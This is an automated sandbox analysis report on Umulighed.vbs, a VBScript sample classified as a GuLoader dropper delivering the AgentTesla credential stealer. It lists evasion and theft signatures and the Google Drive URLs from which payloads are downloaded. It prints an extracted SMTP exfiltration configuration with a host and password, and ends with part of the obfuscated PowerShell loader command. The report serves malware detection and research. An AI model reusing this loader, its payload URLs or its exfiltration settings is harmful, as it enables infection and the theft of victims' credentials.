Windows Analysis Report
Umulighed.vbs

Overview

General Information

Sample name: Umulighed.vbs
Analysis ID: 1430859
MD5: 7a879857b435057c4825e33b280baa15
SHA1: d79ea735b0440d929bb6b046974e03915cb8bfd8
SHA256: d15c94ea77716eb5071b879c630b22509e0cee099bb7f9d3f823b8fb57f77d6d
Tags: vbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: cmd.exe.5480.5.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.cash4cars.nz", "Username": "logs@cash4cars.nz", "Password": "logs2024!"}
Source: unknown HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb= source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1999089456.0000000007459000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1991407968.0000000002D38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2004519989.0000000008470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdbF source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb#j source: powershell.exe, 00000004.00000002.1991407968.0000000002CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: newfile.exe

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 114.142.162.17:26
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 114.142.162.17 114.142.162.17
Source: Joe Sandbox View ASN Name: SERVERMULE-AS-APNimbus2PtyLtdAU SERVERMULE-AS-APNimbus2PtyLtdAU
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ip-api.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.cash4cars.nz
Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0R
Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000009.00000002.2958054380.0000000024EDA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2143116770.0000000024E77000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957213484.0000000022E94000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2957958422.0000000024E4A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3901000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1992852732.0000000004911000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBtq
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2122412787.00000221D5AF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 00000001.00000002.2122412787.00000221D5A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/i
Source: wab.exe, 00000009.00000002.2943582396.0000000007242000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3B27000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFP
Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunFXR~l
Source: powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000009.00000002.2943582396.0000000007261000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2943582396.0000000007208000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=download
Source: wab.exe, 00000009.00000003.1980141801.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1RpbgeefCbfe4fi32TLrpBFNby3_b7V9N&export=downloadgo
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1ujhlMu_uY5j0tuvHXsbN0Gf5xcCLQunF&export=download
Source: powershell.exe, 00000004.00000002.1992852732.0000000004A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2122412787.00000221D448E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.2261833973.00000221E3970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1995366811.0000000005978000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000001.00000002.2122412787.00000221D3E3F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5AF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D5B1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2122412787.00000221D3E3B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958589657.0000000007279000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.1958507079.0000000007279000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.101:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.2.132:443 -> 192.168.2.4:49738 version: TLS 1.2

System Summary

barindex
Source: amsi64_6912.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6208.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6912, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6208, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7215
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7215
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7215 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 7215 Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes.$Svveflyvers.Invoke($Acned, $Unbumped);}$Professorships;}function Jots($Misagent){& ($Jargonens) ($Misagent);}$Orthoarsenite=Disken 'DyrenM.agisoFornozSpasmi GammlcompllJordsaInt,a/ Proa5Gaest.Anu y0slibr ,ters(UnderWTulwaiLyshanFa eldIndsyoStrmpw SnebsC.lam IndtNGu.naT Tabu Balan1Docum0Cowsh. Obl,0Reap.; Ti.l XorinWcataciFusi,nRoya 6Bijug4Cr.ck;Efter ReaffxBalsa6 va,b4.arco;Efter ,andlr Sek.vMilit: nint1fremk2Beiji1Bl,nk.Uncre0 Hard) Albr A,tneG Ga.se Sl.dc s.inkUndero argo/Kazat2Banka0Outs,1impra0Reson0Unapp1Bille0Pikke1eleme RveskF MothiTjenerUnma,ePriapfK.emto AnpaxActiv/Ufo,d1 iru2Pizzl1Tetra.A,opt0Coun ';$Orlops=Disken 'ClaudUPhrensIndhaeDrejerFolk.-Ru,drA CarpgHkasse Unwan relatSuffu ';$Horrify=Disken 'R,nsehEspaltInodot.ranopRent.sFe.ie:,rage/ Kast/SemicdOpfrsrTel,diFlydevHazieeSpeck.Nickeg dtro Bndso DriegHansilAs.emeTradu..asshcBdet.oUnpramPilus/Le.oruSpinncNon.i? FilieFyrsvxSpellpCam.soFragmrTilbatSocia=AttacdPouncoBjergwDekorn.nterlUgekooTalmsaGastrdc,pry&justiiVolumdL,tsv=Uds,y1 CyliuI.rigj istoh IndilSogneMLnninuprveu_ lakuBriksYUncon5MangejAmtsr0 Ga.etTropiuLathevHackeHRail,XO,phasOologbSkovtNMesse0 JohnGInsemftvivl5 BespxAntiacbidraC,untsLOestrQSc.mmuMayorn Ze.eFRacem ';$Cachinnate=Disken 'swine> Kumy ';$Jargonens=Disken 'Unp.uiCo.tre D.ngx aggr ';$Pessimistisk='Blanketten';Jots (Disken 'PredrSInfuse Pr,ntSalgs-Co tiCDiffeoIntelnPaa lt Stboe envanKlaphtKva m Tilbr-RedobPOp,avaUn,xptChlorh urr Er gsTForsl:Homet\ ImpaBKlag,a ContdFlet.nKr,gsiOverdnAfrungUni.ie IsoprDesia.ActustDuplixudstytTiltu Ly.u-FirehVMidshaFl,kel.kspouBortkeEmbry Noto$ ResuPUnblieEp,stsNoncosmven iGarewmIlldiiDra,ts artitPedomiSm lss HypokPe,fe;Folke ');Jots (Disken 'VacatiBekenf Stin Inhal( Lym tOenoleAplodsGonertU.end-Noy npEata.a,ngentKommuhChart JuicT Rigs:tokom\C.uriB JenkaInfardNobilnFor.oiFininnAabengAffa eClairr Nonr.Age.tt til,x,iktotUnbla)Ova o{Hundee nstmxFor oi onant ,xsa}Aand.;Tr,ld ');$Monotonises = Disken 'MadoleBuzzwcPlaceh TromoSmede Affil% otaaCurcip Chrop Bre,dBestta sidetPrincaLegwo%,anke\DyppeKKvg.elAfkoraVoldspCotanj KrisaUnloqgSparetH,alpeProc.rkeesdsErita.DatapSDisple Radap Er,v Thomi& Linj&forko Al.neFalusc HydrhChilioDetru Exone$Rekur ';Jots (Disken ' icho$Al rmgSalgsl EklioKonnibSelfsaAfs.alDe.om:FrnvnSC ianyFac.dnStubbk Le tr alumoIs.denForhisMi levbromomBeboen HngsiChefknPseudgForsms Menu=Fr ki(CatticSkabnmSierrdVr.ma .rusk/Outstc Laic Virtu$,roxiMSt,afo pocn uryoSjleat Scylo Fi.knAgurkiFibersTresaeA.tifsC cre)Mes.n ');Jots (Disken 'Sleke$SkrkpgQuatel,koleoHairmbTrotta AllulKulka: emorpSemitaDogslrUnthraOpfrsdUnderruforroBaadepTiptap,isfoiBemusn HebdgUd ad=Refam$ FreuHFjendo NewlrVinker B
